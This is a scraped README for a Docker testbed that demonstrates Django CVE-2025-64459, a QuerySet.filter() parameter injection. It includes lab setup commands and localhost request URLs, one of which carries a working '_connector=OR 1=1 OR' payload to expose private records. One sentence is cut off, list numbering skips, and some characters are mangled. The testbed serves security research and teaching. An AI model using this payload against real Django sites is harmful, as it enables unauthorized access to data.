## https://sploitus.com/exploit?id=B6A261DE-73D4-5EE2-84F2-4CEBA2D1BC55
# Django-CVE-2025-64459-Testbed
A self-contained testbed for Django CVE-2025-64459. Demonstrates QuerySet.filter() parameter injection via dictionary expansion using Docker.
## About the Vulnerability
**CVE-2025-64459** is a high-severity vulnerability in Django (specifically versions
## Test with Vulnerable Target
If you have the [Vulnerable Target](https://github.com/HappyHackingSpace/vulnerable-target) CLI installed or want to run it from source:
1. Clone the Vulnerable Target repository:
```bash
git clone https://github.com/HappyHackingSpace/vulnerable-target
cd vulnerable-target
```
2. Run the lab using the ID:
```bash
go run cmd/vt/main.go start --id vt-2025-64459
```
3. b00m!
5. with Nuclei
## ๐ ๏ธ Usage & Exploitation
| Description | Link |
| :--- | :--- |
| **Show All (Empty Search)** | [/?](http://localhost:8001/search/?) |
| **Normal Search** | [/?title__icontains=Public](http://localhost:8001/search/?title__icontains=Public) |
| **Exploit Attempt (Private)** | [/?status=private&title__icontains=Area](http://localhost:8001/search/?status=private&title__icontains=Area) |
| **_connector Exploit (CVE-2025-64459)** | [/?_connector=OR 1=1 OR&title__icontains=Public](http://localhost:8001/search/?_connector=OR%201=1%20OR&title__icontains=Public) |
## โ ๏ธ Disclaimer
This repository is for **educational and research purposes only**. Do not use this on systems you do not own or have explicit permission to test. The author is not responsible for any misuse of this information.